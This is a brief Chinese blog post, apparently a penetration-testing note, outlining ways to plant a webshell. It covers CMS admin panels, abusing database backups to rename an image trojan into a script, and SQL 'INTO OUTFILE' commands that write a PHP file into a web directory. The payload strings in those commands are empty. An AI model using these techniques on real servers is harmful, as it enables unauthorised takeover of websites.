获取webshell的方法

获取webshell的方法

CMS获取webshell

通过搜索引擎搜索CMS网站程序名称

  • phpcms拿Webshell、WordPress后台拿Webshell等

非CMS获取webshell

1、数据库备份获取webshell

  • 1、上传图片木马并获取上传后图片访问地址
  • 2、利用后台数据库备份方法,备份图片木马,并重命名(名称+后缀),获取访问地址
  • 3、访问备份木马文件,获取webshell

2、抓包获取webshell

3、SQL命令执行获取webshell

  • Select ‘’ into outfile ‘c:\wwwtest\eval.php’
  • 第一种
    CREATE TABLE mysql.best (best1 TEXT NOT NULL );
    INSERT INTO mysql.best (best1 ) VALUES (’’);
    SELECT best1 FROM best INTO OUTFILE ‘D:\phpStudy\WWW\best111111.php’;

你可能感兴趣的:(渗透测试,网络安全,渗透测试,获取webshell,CMS)